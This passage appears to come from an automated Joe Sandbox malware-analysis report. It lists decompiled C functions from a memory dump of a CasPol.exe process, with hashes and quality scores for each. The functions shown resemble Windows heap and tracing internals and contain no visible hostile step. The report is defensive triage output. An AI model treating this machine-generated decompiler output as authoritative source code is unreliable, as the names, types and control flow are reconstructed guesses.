                                                                				_t9 = _t73 + 0x10; // 0x10
                                                                				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                                                				E0166F3E0(_t9, _v8, _t57);
                                                                				_t41 =  *_t70;
                                                                				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                                                					_t62 = 3;
                                                                					asm("int 0x29");
                                                                					_push(_t62);
                                                                					_push(_t57);
                                                                					_push(_t73);
                                                                					_push(_t70);
                                                                					_t71 = _t62;
                                                                					_t74 = 0;
                                                                					_v36 = 0;
                                                                					_t63 = E0165A2F0(_t62, _t71, 1, 6,  &_v36);
                                                                					if(_t63 == 0) {
                                                                						L20:
                                                                						_t44 = 0x57;
                                                                						return _t44;
                                                                					}
                                                                					_t45 = _v12;
                                                                					_t58 = 0x1c;
                                                                					if(_t45 < _t58) {
                                                                						goto L20;
                                                                					}
                                                                					_t69 = _t45 / _t58;
                                                                					if(_t69 == 0) {
                                                                						L19:
                                                                						return 0xe8;
                                                                					}
                                                                					_t59 = _v0;
                                                                					do {
                                                                						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                                                							goto L18;
                                                                						}
                                                                						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                                                						 *_t59 = _t49;
                                                                						if( *_t49 != 0x53445352) {
                                                                							goto L18;
                                                                						}
                                                                						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                                                						return 0;
                                                                						L18:
                                                                						_t63 = _t63 + 0x1c;
                                                                						_t74 = _t74 + 1;
                                                                					} while (_t74 < _t69);
                                                                					goto L19;
                                                                				}
                                                                				 *_t73 = _t41;
                                                                				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                                                				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                                                				 *_t70 = _t73;
                                                                				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                                                				return 0;
                                                                			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                • Instruction ID: 7f3863aed1059b53172c0e13706e2b37268e60d80c5ec51fb48dad10838f32aa
                                                                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                • Instruction Fuzzy Hash: 8C214971A00205EFDB21DF69CD44AAAFBF8EF54754F2488AEE949A7250D730AD41CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 59%
                                                                			E01653B7A(void* __ecx) {
                                                                				signed int _v8;
                                                                				char _v12;
                                                                				intOrPtr _v20;
                                                                				intOrPtr _t17;
                                                                				intOrPtr _t26;
                                                                				void* _t35;
                                                                				void* _t38;
                                                                				void* _t41;
                                                                				intOrPtr _t44;
                                                                
                                                                				_t17 =  *0x17184c4; // 0x0
                                                                				_v12 = 1;
                                                                				_v8 =  *0x17184c0 * 0x4c;
                                                                				_t41 = __ecx;
                                                                				_t35 = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x17184c0 * 0x4c);
                                                                				if(_t35 == 0) {
                                                                					_t44 = 0xc0000017;
                                                                				} else {
                                                                					_push( &_v8);
                                                                					_push(_v8);
                                                                					_push(_t35);
                                                                					_push(4);
                                                                					_push( &_v12);
                                                                					_push(0x6b);
                                                                					_t44 = E0166AA90();
                                                                					_v20 = _t44;
                                                                					if(_t44 >= 0) {
                                                                						E0166FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x17184c0 * 0xc);
                                                                						_t38 = _t35;
                                                                						if(_t35 < _v8 + _t35) {
                                                                							do {
                                                                								asm("movsd");
                                                                								asm("movsd");
                                                                								asm("movsd");
                                                                								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                                                							} while (_t38 < _v8 + _t35);
                                                                							_t44 = _v20;
                                                                						}
                                                                					}
                                                                					_t26 =  *0x17184c4; // 0x0
                                                                					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                                                				}
                                                                				return _t44;
                                                                			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9eeb9c066ee90def3bcf83509c035b756c40f96606f9d9f734eb0197e6df247a
                                                                • Instruction ID: bff564908894162035f9d44cc7a7a8d6428239a8d08402ce60f528cfada750d9
                                                                • Opcode Fuzzy Hash: 9eeb9c066ee90def3bcf83509c035b756c40f96606f9d9f734eb0197e6df247a
                                                                • Instruction Fuzzy Hash: C1219F72A00109AFC710DF98CD81B6ABBBEFB44758F1540A8EA08AB251D771ED01CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 80%
                                                                			E016A6CF0(void* __edx, intOrPtr _a4, short _a8) {
                                                                				char _v8;
                                                                				char _v12;
                                                                				char _v16;
                                                                				char _v20;
                                                                				char _v28;
                                                                				char _v36;
                                                                				char _v52;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				signed char* _t21;
                                                                				void* _t24;
                                                                				void* _t36;
                                                                				void* _t38;
                                                                				void* _t46;
                                                                
                                                                				_push(_t36);
                                                                				_t46 = __edx;
                                                                				_v12 = 0;
                                                                				_v8 = 0;
                                                                				_v20 = 0;
                                                                				_v16 = 0;
                                                                				if(E01647D50() == 0) {
                                                                					_t21 = 0x7ffe0384;
                                                                				} else {
                                                                					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                				}
                                                                				if( *_t21 != 0) {
                                                                					_t21 =  *[fs:0x30];
                                                                					if((_t21[0x240] & 0x00000004) != 0) {
                                                                						if(E01647D50() == 0) {
                                                                							_t21 = 0x7ffe0385;
                                                                						} else {
                                                                							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                						}
                                                                						if(( *_t21 & 0x00000020) != 0) {
                                                                							_t56 = _t46;
                                                                							if(_t46 == 0) {
                                                                								_t46 = 0x1605c80;
                                                                							}
                                                                							_push(_t46);
                                                                							_push( &_v12);
                                                                							_t24 = E0165F6E0(_t36, 0, _t46, _t56);
                                                                							_push(_a4);
                                                                							_t38 = _t24;
                                                                							_push( &_v28);
                                                                							_t21 = E0165F6E0(_t38, 0, _t46, _t56);
                                                                							if(_t38 != 0) {
                                                                								if(_t21 != 0) {
                                                                									E016A7016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                                                									L01642400( &_v52);
                                                                								}
                                                                								_t21 = L01642400( &_v28);
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				return _t21;
                                                                			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7dc951b8f7eec0479adec0651f20940e3cd6cc22880d3745e69911a3a8e89dbb
                                                                • Instruction ID: 4a07a17e43962e85e71d7a698d455f898e0bbcbef91079021bed0c52ec064c95
                                                                • Opcode Fuzzy Hash: 7dc951b8f7eec0479adec0651f20940e3cd6cc22880d3745e69911a3a8e89dbb
                                                                • Instruction Fuzzy Hash: BB21F2735002469BD311EF28CD44B6BBBECEF91680F48095AFA50C7251E734D949CAE6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 67%
                                                                			E016F070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                				char _v8;
                                                                				intOrPtr _v11;
                                                                				signed int _v12;
                                                                				intOrPtr _v15;
                                                                				signed int _v16;
                                                                				intOrPtr _v28;
                                                                				void* __ebx;
                                                                				char* _t32;
                                                                				signed int* _t38;
                                                                				signed int _t60;
                                                                
                                                                				_t38 = __ecx;
                                                                				_v16 = __edx;
                                                                				_t60 = E016F07DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                                                				if(_t60 != 0) {
                                                                					_t7 = _t38 + 0x38; // 0x29cd5903
                                                                					_push( *_t7);
                                                                					_t9 = _t38 + 0x34; // 0x6adeeb00
                                                                					_push( *_t9);
                                                                					_v12 = _a8 << 0xc;
                                                                					_t11 = _t38 + 4; // 0x5de58b5b
                                                                					_push(0x4000);
                                                                					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                                                					E016EAFDE( &_v8,  &_v12);
                                                                					E016F1293(_t38, _v28, _t60);
                                                                					if(E01647D50() == 0) {
                                                                						_t32 = 0x7ffe0380;
                                                                					} else {
                                                                						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                					}
                                                                					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                                                						E016E14FB(_t38,  *_t21, _v11, _v15, 0xd);
                                                                					}
                                                                				}
                                                                				return  ~_t60;
                                                                			}














                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                • Instruction ID: a39f25407c0c9c46adf4e99a86b4c7394984e4275a8be005a26c277e6efd2cb9
                                                                • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                • Instruction Fuzzy Hash: 222122362042009FD705DF18CC84B6ABBA7EBD4350F04866DFA948B382C730D809CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 35%
                                                                			E016F2EF7(void* __ecx, signed int __edx, void* _a8, signed int _a12) {
                                                                				char _v5;
                                                                				unsigned int _v12;
                                                                				signed int _v16;
                                                                				signed int _v20;
                                                                				signed int _v32;
                                                                				signed int _v44;
                                                                				signed int _v48;
                                                                				intOrPtr _v52;
                                                                				intOrPtr _v56;
                                                                				signed int _v60;
                                                                				signed int _v64;
                                                                				void* _v68;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed int _t62;
                                                                				void* _t71;
                                                                				signed int _t94;
                                                                				signed int _t105;
                                                                				signed int _t106;
                                                                				void* _t107;
                                                                				signed int _t114;
                                                                				signed int _t115;
                                                                				signed int _t141;
                                                                				signed int _t142;
                                                                				signed char _t145;
                                                                				signed char _t146;
                                                                				void* _t154;
                                                                				signed int _t155;
                                                                				void* _t156;
                                                                				signed int _t160;
                                                                				signed int _t164;
                                                                				void* _t165;
                                                                				signed int _t172;
                                                                				signed int _t174;
                                                                
                                                                				_push(__ecx);
                                                                				_push(__ecx);
                                                                				_t105 = __edx;
                                                                				_t154 = __ecx;
                                                                				_t160 =  *__edx ^ __edx;
                                                                				_t141 =  *(__edx + 4) ^ __edx;
                                                                				if(( *(_t160 + 4) ^ _t160) != __edx || ( *_t141 ^ _t141) != __edx) {
                                                                					_t114 = 3;
                                                                					asm("int 0x29");
                                                                					_t174 = (_t172 & 0xfffffff8) - 0x24;
                                                                					_t62 =  *0x171d360 ^ _t174;
                                                                					_v32 = _t62;
                                                                					_push(_t105);
                                                                					_push(_t160);
                                                                					_t106 = _t114;
                                                                					_t115 = _v20;
                                                                					_push(_t154);
                                                                					_t155 = _t141;
                                                                					_t142 = _v16;
                                                                					__eflags = _t115;
                                                                					if(__eflags != 0) {
                                                                						asm("bsf esi, ecx");
                                                                					} else {
                                                                						asm("bsf esi, edx");
                                                                						_t62 = (_t62 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff;
                                                                						__eflags = _t62;
                                                                						if(_t62 == 0) {
                                                                							_t160 = _v44;
                                                                						} else {
                                                                							_t160 = _t160 + 0x20;
                                                                						}
                                                                					}
                                                                					__eflags = _t142;
                                                                					if(__eflags == 0) {
                                                                						asm("bsr eax, ecx");
                                                                					} else {
                                                                						asm("bsr ecx, edx");
                                                                						if(__eflags == 0) {
                                                                							_t62 = _v44;
                                                                						} else {
                                                                							_t27 = _t115 + 0x20; // 0x20
                                                                							_t62 = _t27;
                                                                						}
                                                                					}
                                                                					_v56 = (_t160 << 0xc) + _t155;
                                                                					_v60 = _t62 - _t160 + 1 << 0xc;
                                                                					_t71 = E0166D0F0(1, _t62 - _t160 + 1, 0);
                                                                					asm("adc edx, 0xffffffff");
                                                                					_v52 = E0166D0F0(_t71 + 0xffffffff, _t160, 0);
                                                                					_v48 = 0;
                                                                					_v44 = _t155 + 0x10;
                                                                					E01642280(_t155 + 0x10, _t155 + 0x10);
                                                                					__eflags = _a12;
                                                                					_push(_v64);
                                                                					_push(_v60);
                                                                					_push( *((intOrPtr*)(_t106 + 0x20)));
                                                                					if(_a12 == 0) {
                                                                						 *0x171b1e0();
                                                                						 *( *(_t106 + 0x30) ^  *0x1716110 ^ _t106)();
                                                                						 *(_t155 + 0xc) =  *(_t155 + 0xc) &  !_v60;
                                                                						_t54 = _t155 + 8;
                                                                						 *_t54 =  *(_t155 + 8) &  !_v64;
                                                                						__eflags =  *_t54;
                                                                						goto L18;
                                                                					} else {
                                                                						 *0x171b1e0();
                                                                						_t164 =  *( *(_t106 + 0x2c) ^  *0x1716110 ^ _t106)();
                                                                						__eflags = _t164;
                                                                						if(_t164 >= 0) {
                                                                							 *(_t155 + 8) =  *(_t155 + 8) | _v64;
                                                                							 *(_t155 + 0xc) =  *(_t155 + 0xc) | _v60;
                                                                							L18:
                                                                							asm("lock xadd [eax], ecx");
                                                                							_t164 = 0;
                                                                							__eflags = 0;
                                                                						}
                                                                					}
                                                                					E0163FFB0(_t106, _t155, _v56);
                                                                					_pop(_t156);
                                                                					_pop(_t165);
                                                                					_pop(_t107);
                                                                					__eflags = _v48 ^ _t174;
                                                                					return E0166B640(_t164, _t107, _v48 ^ _t174, 0, _t156, _t165);
                                                                				} else {
                                                                					_t94 = _t141 ^ _t160;
                                                                					 *_t141 = _t94;
                                                                					 *(_t160 + 4) = _t94;
                                                                					_t145 =  !( *(__edx + 8));
                                                                					_t146 = _t145 >> 8;
                                                                					_v12 = _t146 >> 8;
                                                                					_v5 =  *((intOrPtr*)((_t145 & 0x000000ff) + 0x160ac00)) +  *((intOrPtr*)((_t146 & 0x000000ff) + 0x160ac00));
                                                                					asm("lock xadd [eax], edx");
                                                                					return __ecx + 0x18;
                                                                				}
                                                                			}







































                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d01b902984eca0a5be8b4742c325092134b06a4796f1053802a0008da9ac9848
                                                                • Instruction ID: 5ad6cde3b7ed68815309e3870f7569041139c4fe534ffe5fadcb582e5743b963
                                                                • Opcode Fuzzy Hash: d01b902984eca0a5be8b4742c325092134b06a4796f1053802a0008da9ac9848
                                                                • Instruction Fuzzy Hash: FB21BBB12142500FD706CF5ACCA49B7BFE5EFC611235B81E9D988CB743C924941AC7A0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 96%
                                                                			E0165ABD8(void* __ecx) {
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				signed int _t18;
                                                                				signed char _t22;
                                                                				intOrPtr _t31;
                                                                				signed char _t34;
                                                                				signed char _t42;
                                                                				unsigned int _t44;
                                                                				void* _t49;
                                                                				signed int* _t53;
                                                                
                                                                				_push(__ecx);
                                                                				_t49 = __ecx;
                                                                				_t18 = __ecx + 0xc0;
                                                                				_t31 =  *((intOrPtr*)(_t18 + 4));
                                                                				while(_t31 != _t18) {
                                                                					_t9 = _t31 - 8; // -8
                                                                					_t53 = _t9;
                                                                					if( *(_t49 + 0x4c) != 0) {
                                                                						_t44 =  *(_t49 + 0x50) ^  *_t53;
                                                                						 *_t53 = _t44;
                                                                						_t38 = _t44 >> 0x00000010 ^ _t44 >> 0x00000008 ^ _t44;
                                                                						if(_t44 >> 0x18 != (_t44 >> 0x00000010 ^ _t44 >> 0x00000008 ^ _t44)) {
                                                                							E016DFA2B(_t31, _t49, _t53, _t49, _t53, __eflags, _t38);
                                                                						}
                                                                					}
                                                                					_t34 =  *_t53 & 0x0000ffff;
                                                                					_t18 = 0x200;
                                                                					_t42 = _t34 >> 8;
                                                                					if(_t34 <= 0x200) {
                                                                						__eflags =  *(_t49 + 0x4c);
                                                                						if( *(_t49 + 0x4c) != 0) {
                                                                							_t53[0] = _t53[0] ^ _t42 ^ _t34;
                                                                							_t18 =  *(_t49 + 0x50);
                                                                							 *_t53 =  *_t53 ^ _t18;
                                                                							__eflags =  *_t53;
                                                                						}
                                                                						break;
                                                                					}
                                                                					_t22 = _t53[0];
                                                                					if((_t22 & 0x00000008) != 0) {
                                                                						__eflags =  *(_t49 + 0x4c);
                                                                						if(__eflags != 0) {
                                                                							_t53[0] = _t22 ^ _t42 ^ _t34;
                                                                							 *_t53 =  *_t53 ^  *(_t49 + 0x50);
                                                                							__eflags =  *_t53;
                                                                						}
                                                                					} else {
                                                                						E0165AC7B(_t49, _t53);
                                                                					}
                                                                					_t31 =  *((intOrPtr*)(_t31 + 4));
                                                                					_t18 = _t49 + 0xc0;
                                                                				}
                                                                				return _t18;
                                                                			}
















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6d1d207ce53efa8c22bf27fbc4c7e5f30861c9883542d2abfefc5c8e464cac72
                                                                • Instruction ID: 275ccb9618d56edb87d335db1b9fada59eb965cdfbb7813e579abb04061c2fbd
                                                                • Opcode Fuzzy Hash: 6d1d207ce53efa8c22bf27fbc4c7e5f30861c9883542d2abfefc5c8e464cac72
                                                                • Instruction Fuzzy Hash: 6821E4302006069BDB28CF6DC8846F6BBE6FB99304F54831ED9D687741D731B806CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 77%
                                                                			E016F1FF1(void* __ecx, intOrPtr __edx, signed int _a4) {
                                                                				intOrPtr _v8;
                                                                				signed int _t22;
                                                                				signed int _t34;
                                                                				signed int _t38;
                                                                				signed int _t41;
                                                                				signed int _t42;
                                                                				signed int _t44;
                                                                				signed int _t54;
                                                                				signed int _t55;
                                                                
                                                                				_t44 = _a4;
                                                                				_v8 = __edx;
                                                                				_t3 = _t44 + 0x1007; // 0x1007
                                                                				_t41 = _t3 & 0xfffff000;
                                                                				_t54 = ( *_t44 ^  *0x1716110 ^ _t44) >> 0x00000001 & 0x00007fff;
                                                                				if(_t41 - _t44 < _t54 << 3) {
                                                                					_t42 = _t41 + 0xfffffff0;
                                                                					_t34 = _t42 - _t44 >> 3;
                                                                					_t55 = _t54 - _t34;
                                                                					 *_t44 =  *_t44 ^ (_t34 + _t34 ^  *_t44 ^  *0x1716110 ^ _t44) & 0x0000fffe;
                                                                					asm("stosd");
                                                                					asm("stosd");
                                                                					asm("stosd");
                                                                					asm("stosd");
                                                                					_t22 = ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff) + ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff);
                                                                					 *_t42 = _t22;
                                                                					_t38 = _t42 + _t55 * 8;
                                                                					 *_t42 = _t22 ^  *0x1716110 ^ _t42;
                                                                					if(_t38 < _v8 + (( *(_v8 + 0x14) & 0x0000ffff) + 3) * 8) {
                                                                						 *_t38 =  *_t38 ^ (_t55 << 0x00000010 ^  *0x1716110 ^ _t38 ^  *_t38) & 0x7fff0000;
                                                                					}
                                                                				} else {
                                                                					_t42 = 0;
                                                                				}
                                                                				return _t42;
                                                                			}













                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6bca8a5b1389e3bbe033c05dd73300f037435109586239d8a943d58f6e111ddc
                                                                • Instruction ID: c11dea23bc7c195587871aadfffe60b3a0d71be96358ad35e1485becb1cc8d4a
                                                                • Opcode Fuzzy Hash: 6bca8a5b1389e3bbe033c05dd73300f037435109586239d8a943d58f6e111ddc
                                                                • Instruction Fuzzy Hash: 1E21A233A104159B9B18CF7CC815566F7E6EF8C22032A867ED912DB265EAB0BD11CB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 82%
                                                                			E016A7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                				intOrPtr _v8;
                                                                				intOrPtr _v12;
                                                                				intOrPtr _t21;
                                                                				void* _t24;
                                                                				intOrPtr _t25;
                                                                				void* _t36;
                                                                				short _t39;
                                                                				signed char* _t42;
                                                                				unsigned int _t46;
                                                                				void* _t50;
                                                                
                                                                				_push(__ecx);
                                                                				_push(__ecx);
                                                                				_t21 =  *0x1717b9c; // 0x0
                                                                				_t46 = _a8;
                                                                				_v12 = __edx;
                                                                				_v8 = __ecx;
                                                                				_t4 = _t46 + 0x2e; // 0x2e
                                                                				_t36 = _t4;
                                                                				_t24 = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                                                				_t50 = _t24;
                                                                				if(_t50 != 0) {
                                                                					_t25 = _a4;
                                                                					if(_t25 == 5) {
                                                                						L3:
                                                                						_t39 = 0x14b1;
                                                                					} else {
                                                                						_t39 = 0x14b0;
                                                                						if(_t25 == 6) {
                                                                							goto L3;
                                                                						}
                                                                					}
                                                                					 *((short*)(_t50 + 6)) = _t39;
                                                                					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                                                					_t11 = _t50 + 0x2c; // 0x2c
                                                                					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                                                					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                                                					E0166F3E0(_t11, _a12, _t46);
                                                                					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                                                					if(E01647D50() == 0) {
                                                                						_t42 = 0x7ffe0384;
                                                                					} else {
                                                                						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                					}
                                                                					_push(_t50);
                                                                					_t19 = _t36 - 0x20; // 0xe
                                                                					_push(0x403);
                                                                					_push( *_t42 & 0x000000ff);
                                                                					E01669AE0();
                                                                					_t24 = L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                                                				}
                                                                				return _t24;
                                                                			}














                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b2f281d653b8d8fdc82a51b54e74d4c7dfe11b5bae14832dbb9cabadb654870c
                                                                • Instruction ID: fe96b65a51ca095c3315c76bc31bbfd9237e8ba67513c9a93cde4614c405a298
                                                                • Opcode Fuzzy Hash: b2f281d653b8d8fdc82a51b54e74d4c7dfe11b5bae14832dbb9cabadb654870c
                                                                • Instruction Fuzzy Hash: 1E216D72900644ABC725DF69DC90EABBBA9EF48740F10456DEA0AD7750DB35ED00CBA8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 96%
                                                                			E0164AE73(intOrPtr __ecx, void* __edx) {
                                                                				intOrPtr _v8;
                                                                				void* _t19;
                                                                				char* _t22;
                                                                				signed char* _t24;
                                                                				intOrPtr _t25;
                                                                				intOrPtr _t27;
                                                                				void* _t31;
                                                                				intOrPtr _t36;
                                                                				char* _t38;
                                                                				signed char* _t42;
                                                                
                                                                				_push(__ecx);
                                                                				_t31 = __edx;
                                                                				_v8 = __ecx;
                                                                				_t19 = E01647D50();
                                                                				_t38 = 0x7ffe0384;
                                                                				if(_t19 != 0) {
                                                                					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                				} else {
                                                                					_t22 = 0x7ffe0384;
                                                                				}
                                                                				_t42 = 0x7ffe0385;
                                                                				if( *_t22 != 0) {
                                                                					if(E01647D50() == 0) {
                                                                						_t24 = 0x7ffe0385;
                                                                					} else {
                                                                						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                					}
                                                                					if(( *_t24 & 0x00000010) != 0) {
                                                                						goto L17;
                                                                					} else {
                                                                						goto L3;
                                                                					}
                                                                				} else {
                                                                					L3:
                                                                					_t27 = E01647D50();
                                                                					if(_t27 != 0) {
                                                                						_t27 =  *[fs:0x30];
                                                                						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                                                					}
                                                                					if( *_t38 != 0) {
                                                                						_t27 =  *[fs:0x30];
                                                                						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                                                							goto L5;
                                                                						}
                                                                						_t27 = E01647D50();
                                                                						if(_t27 != 0) {
                                                                							_t27 =  *[fs:0x30];
                                                                							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                                                						}
                                                                						if(( *_t42 & 0x00000020) != 0) {
                                                                							L17:
                                                                							_t25 = _v8;
                                                                							_t36 = 0;
                                                                							if(_t25 != 0) {
                                                                								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                                                							}
                                                                							_t27 = E016A7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                                                						}
                                                                						goto L5;
                                                                					} else {
                                                                						L5:
                                                                						return _t27;
                                                                					}
                                                                				}
                                                                			}














                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                • Instruction ID: 5baa470d8b5dccef382ed55efc499289b511d4ce0c77d441f5deefe336abaf49
                                                                • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                • Instruction Fuzzy Hash: 3921D132601691AFEB26DB6CCD54B257BE9EF44640F1900A8EE058BBA2E734DC41C6E0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 93%
                                                                			E0165FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                				intOrPtr _v8;
                                                                				void* _t19;
                                                                				intOrPtr _t29;
                                                                				intOrPtr _t32;
                                                                				intOrPtr _t35;
                                                                				intOrPtr _t37;
                                                                				intOrPtr* _t40;
                                                                
                                                                				_t35 = __edx;
                                                                				_push(__ecx);
                                                                				_push(__ecx);
                                                                				_t37 = 0;
                                                                				_v8 = __edx;
                                                                				_t29 = __ecx;
                                                                				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                                                					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                                                					L3:
                                                                					_t19 = _a4 - 4;
                                                                					if(_t19 != 0) {
                                                                						if(_t19 != 1) {
                                                                							L7:
                                                                							return _t37;
                                                                						}
                                                                						if(_t35 == 0) {
                                                                							L11:
                                                                							_t37 = 0xc000000d;
                                                                							goto L7;
                                                                						}
                                                                						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                                                							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                                                							_t35 = _v8;
                                                                						}
                                                                						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                                                						goto L7;
                                                                					}
                                                                					if(_t29 == 0) {
                                                                						goto L11;
                                                                					}
                                                                					_t32 =  *_t40;
